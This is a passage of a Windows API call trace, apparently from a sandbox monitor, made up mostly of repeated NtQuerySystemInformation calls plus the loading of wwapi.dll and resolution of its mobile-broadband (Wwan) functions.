(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc48, Length=0x30, ResultLength=0x0) [0233.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc48, Length=0x30, ResultLength=0x0) [0233.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc48, Length=0x30, ResultLength=0x0) [0233.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc48, Length=0x30, ResultLength=0x0) [0233.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd80, Length=0x30, ResultLength=0x0) [0233.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffde98, Length=0x30, ResultLength=0x0) [0233.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffddd0, Length=0x28, ResultLength=0x0) [0233.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc70, Length=0x20, ResultLength=0x0) [0233.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc20, Length=0x20, ResultLength=0x0) [0233.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdda0, Length=0x28, ResultLength=0x0) [0233.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc20, Length=0x28, ResultLength=0x0) [0233.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc30, Length=0x18, ResultLength=0x0) [0233.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffde98, Length=0x30, ResultLength=0x0) [0233.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffddd0, Length=0x28, ResultLength=0x0) [0233.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc70, Length=0x20, ResultLength=0x0) [0233.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc20, Length=0x20, ResultLength=0x0) [0233.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd58, Length=0x38, ResultLength=0x0) [0233.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc70, Length=0x20, ResultLength=0x0) [0233.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc70, Length=0x20, ResultLength=0x0) [0233.745] LoadLibraryExW (lpLibFileName="C:\\WINDOWS\\system32\\wwapi.dll", hFile=0x0, dwFlags=0x0) returned 0x7ffcd5220000 [0233.756] GetProcAddress (hModule=0x7ffcd5220000, lpProcName="WwanOpenHandle") returned 0x7ffcd5221040 [0233.756] GetProcAddress (hModule=0x7ffcd5220000, lpProcName="WwanCloseHandle") returned 0x7ffcd5226170 [0233.756] GetProcAddress (hModule=0x7ffcd5220000, lpProcName="WwanEnumerateInterfaces") returned 0x7ffcd52270e0 [0233.756] GetProcAddress (hModule=0x7ffcd5220000, lpProcName="WwanQueryInterface") returned 0x7ffcd5228e60 [0233.756] GetProcAddress (hModule=0x7ffcd5220000, lpProcName="WwanFreeMemory") returned 0x7ffcd522cbc0 [0233.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc70, Length=0x20, ResultLength=0x0) [0233.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.757] WwanOpenHandle () returned 0x426 [0233.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc00, Length=0x20, ResultLength=0x0) [0233.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffde98, Length=0x30, ResultLength=0x0) [0233.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffddd0, Length=0x28, ResultLength=0x0) [0233.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc70, Length=0x20, ResultLength=0x0) [0233.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc20, Length=0x20, ResultLength=0x0) [0233.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdda0, Length=0x28, ResultLength=0x0) [0233.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc20, Length=0x28, ResultLength=0x0) [0233.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc30, Length=0x18, ResultLength=0x0) [0233.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdca0, Length=0x38, ResultLength=0x0) [0233.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdca0, Length=0x38, ResultLength=0x0) [0233.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdca0, Length=0x38, ResultLength=0x0) [0233.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdca0, Length=0x38, ResultLength=0x0) [0233.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdca0, Length=0x38, ResultLength=0x0) [0233.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdca0, Length=0x38, ResultLength=0x0) [0233.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffde98, Length=0x30, ResultLength=0x0) [0233.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffddd0, Length=0x28, ResultLength=0x0) [0233.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc70, Length=0x20, ResultLength=0x0) [0233.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc20, Length=0x20, ResultLength=0x0) [0233.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdda0, Length=0x28, ResultLength=0x0) [0233.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc50, Length=0x28, ResultLength=0x0) [0233.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdcf8, Length=0x30, ResultLength=0x0) [0233.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdbf8, Length=0x48, ResultLength=0x0) [0233.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdbf8, Length=0x48, ResultLength=0x0) [0233.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdbf8, Length=0x48, ResultLength=0x0) [0233.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdbf8, Length=0x48, ResultLength=0x0) [0233.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffde98, Length=0x30, ResultLength=0x0) [0233.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffddd0, Length=0x28, ResultLength=0x0) [0233.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc70, Length=0x20, ResultLength=0x0) [0233.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdda0, Length=0x28, ResultLength=0x0) [0233.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc20, Length=0x28, ResultLength=0x0) [0233.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc30, Length=0x18, ResultLength=0x0) [0233.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdca0, Length=0x38, ResultLength=0x0) [0233.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdca0, Length=0x38, ResultLength=0x0) [0233.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdca0, Length=0x38, ResultLength=0x0) [0233.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffde98, Length=0x30, ResultLength=0x0) [0233.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffddd0, Length=0x28, ResultLength=0x0) [0233.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc70, Length=0x20, ResultLength=0x0) [0233.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc20, Length=0x20, ResultLength=0x0) [0233.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdda0, Length=0x28, ResultLength=0x0) [0233.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc20, Length=0x28, ResultLength=0x0) [0233.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc30, Length=0x18, ResultLength=0x0) [0233.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.778] NtQuerySystemInformation 